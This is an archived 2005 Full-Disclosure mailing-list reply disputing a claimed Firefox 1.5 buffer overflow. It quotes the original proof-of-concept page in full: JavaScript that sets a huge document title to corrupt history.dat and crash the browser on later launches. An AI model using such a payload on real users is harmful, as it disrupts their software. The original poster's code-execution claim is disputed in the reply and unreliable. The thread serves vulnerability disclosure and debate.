lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu Dec 8 13:38:06 2005 From: ad at heapoverflow.com (ad@...poverflow.com) Subject: re: Firefox 1.5 buffer overflow (poc) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 nor a fake , nor you really dont know what is a buffer overflow, but for sure here on my firefox 1.5 EN, the client is much longuer to load to the next boot but it reloads fine without exceptions and there is nothing about a security bug here... ><!-- Firefox 1.5 buffer overflow > >Basically firefox logs all kinda of URL data in it's history.dat file, >this little script will set a really large topic and Firefox will then >save that topic into it's history.dat.. The next time that firefox is >opened, it will instantly crash due to a buffer overflow -- this will >happen everytime until you manually delete the history.dat file -- >which >most users won't figure out. > >this proof of concept will only prevent someone from reopening >their browser after being exploited. DoS if you will. however, code >execution is possible with some modifcations. > >Tested with Firefox 1.5 on Windows XP SP2. > >ZIPLOCK <sickbeatz@...il.com> > >--> ><html><head><title>heh</title><script type="text/javascript"> >function ex() { > var buffer = ""; > for (var i = 0; i < 5000; i++) { > buffer += "A"; > } > var buffer2 = buffer; > for (i = 0; i < 500; i++) { > buffer2 += buffer; > } > document.title = buffer2; >} ></script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME ></a></body></html> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+ 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22 cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb IFxjTMn8Sc0= =SX09 -----END PGP SIGNATURE-----
Powered by blists - more mailing lists